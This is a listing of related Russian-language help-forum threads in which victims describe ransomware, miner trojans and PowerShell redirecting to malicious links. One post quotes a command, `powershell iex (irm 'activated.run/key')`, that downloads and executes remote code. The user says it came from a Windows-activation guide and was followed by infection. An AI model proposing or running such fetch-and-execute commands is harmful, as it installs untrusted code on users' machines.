-
Похожий контент
-
Автор uzayri1999
Как и у многих нагружается процессор, во время игр чувствуется просадка по мощности из-за этого. Смотрел предыдущие темы на сайте по этой проблеме но не сильно разобрался. Нужна помощь
-
Автор Aleksandr Korolev
Добрый день. Недавно взломали RDP одного из рабочих пк, и через него зашифровали данные NAS , попробовали выкупить, сбросили только exe и ключи, расшифровывает, но работает дешифровщик секунд 10, второй раз запустить нельзя , блокируется. Можно ли что то с ним сделать? Сам дешифровшик тоже как вирус , потому что много изменений в реестр вносит , прилагаю файл изменений которые он вносит , сам exe и ключи user id и второй ключvirus.rarНовый текстовый документ.txt#README-TO-DECRYPT-FILES.txt
-
Автор Serega11Rus
Здравствуйте. Скорее всего поймал троян-майнер. Комп в режиме ожидания нагружает ЦП, при включении диспетчера задач, процессор со 100% нагрузки падает моментально на 3-6%. Чищу антивирусом и после перезагрузки появляется снова. Помогите разобраться, пожалуйста
CollectionLog-2025.07.02-12.36.zip
-
Автор Winbeecatcat
каждый раз когда я включаю ноутбук при запуске запускается повершел а потом закрывается, раньше когда у меня был виндовс дефендер он просто писал про троян malgent а сейчас с касперским пишет то что повершел пытался открыть сайт с гифкой с соником и надписью no way (скриншот)
Сегодня, 16.03.2025 20:37:01;Остановлен переход на сайт;Yandex with voice assistant
-
Автор VanyeJ
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.
Событие: Остановлен переход на сайт
Пользователь: WIN-O4R3Q0UCBR5\User
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название:
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту:
Причина: Облачная защита
Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
CollectionLog-2025.02.08-15.48.zip
-
Рекомендуемые сообщения